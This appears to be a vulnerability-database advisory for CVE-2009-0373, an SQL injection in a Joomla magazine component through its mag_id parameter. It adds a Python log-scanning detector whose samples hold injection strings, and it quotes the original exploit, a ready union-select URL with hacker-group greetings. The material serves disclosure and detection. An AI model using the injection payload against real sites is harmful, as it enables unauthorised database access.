ElearningForce Flash Magazine Deluxe SQL Injection Vulnerability

Vulnerability ID: 1117289
Vulnerability type: SQL injection
Published: 2009-01-26
Updated: 2009-02-10
CVE ID: CVE-2009-0373
CNNVD-ID: CNNVD-200901-466
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7881
https://cxsecurity.com/issue/WLB-2009020079
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-466
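|Vulnerability details
Joomla! is an open-source content management system (CMS). An SQL injection vulnerability exists in the ElearningForce Flash Magazine Deluxe (com_flashmagazinedeluxe) component for Joomla!. A remote attacker can execute arbitrary SQL commands via the magazine id (mag_id) parameter in a magazine action to index.php.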
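A detection check for this issue, as an added example that is not part of the original advisory: the script flags web-server log entries that reach com_flashmagazinedeluxe with a mag_id value that is not a plain integer. The log lines are constructed samples, and the rule that legitimate ids are non-negative integers of at most 10 digits is an assumption, not a vendor statement.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Jan/2009:10:01:02 +0000] "GET /index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=4 HTTP/1.1" 200 5120
198.51.100.9 - - [26/Jan/2009:10:03:44 +0000] "GET /index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3/* HTTP/1.1" 200 4811
198.51.100.9 - - [26/Jan/2009:10:04:10 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9100
198.51.100.12 - - [26/Jan/2009:10:05:31 +0000] "GET /index.php?task=magazine&mag_id=7%27&option=com_flashmagazinedeluxe HTTP/1.1" 500 310
"""

COMPONENT = "com_flashmagazinedeluxe"
# client address, request target and status code from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate magazine id is a non-negative integer, max 10 digits.
VALID_ID = re.compile(r"[0-9]{1,10}")


def suspicious_requests(log_text):
    """Return (client, status, decoded mag_id) for every request to the
    component whose mag_id is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status = m.groups()
        # parse_qs URL-decodes values, so encoded quotes and '+' are normalised
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if COMPONENT not in params.get("option", []):
            continue  # other components are out of scope for this check
        # Check every occurrence: a repeated mag_id must not hide a bad value.
        for value in params.get("mag_id", []):
            if not VALID_ID.fullmatch(value):
                findings.append((client, int(status), value))
    return findings


if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} mag_id={value!r}")
```

The same allow-list (integer only) is what the component should enforce on mag_id before the value reaches a query.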
|Exploit
www.turkguvenligi.info / Author : TurkGuvenligi / Mail : admin@turkguvenligi.info

t4cs1zkr4L - Agd_scorp - TheHacker - Fatih - SuSkuN - Zec - DreamTurk - Mr.SheYtaN - Ghost61 - BLaSteR - Desquner

Very Very Thanks : TurkguvenLigi Members - Terrorist Crew

Joomla Component Flash Magazine Deluxe Remote Sql Injection

http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL

component down bro : http://www.elearningforce.biz/flash-magazine-deluxe/flash-magazine-deluxe-description.html

SQL : union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

Are you ready ? , isko s2mi 7.

Hop hop isko top isko , hop hop isko göt isko...

Note : Because of the heavy DDoS that İsko [see: ox] aimed at our machine, the server is being rebuilt...

[TG] online very soon... İsko, I no longer blame you; a.Q to the headman who lets you live in that neighbourhood...

# milw0rm.com [2009-01-26]
|References

Source: XF
Name: flashmagazine-index-sql-injection(48226)
Link: http://xforce.iss.net/xforce/xfdb/48226
Source: BID
Name: 33455
Link: http://www.securityfocus.com/bid/33455
Source: MILW0RM
Name: 7881
Link: http://www.milw0rm.com/exploits/7881
Source: VUPEN
Name: ADV-2009-0249
Link: http://www.frsirt.com/english/advisories/2009/0249
Source: SECUNIA
Name: 33646
Link: http://secunia.com/advisories/33646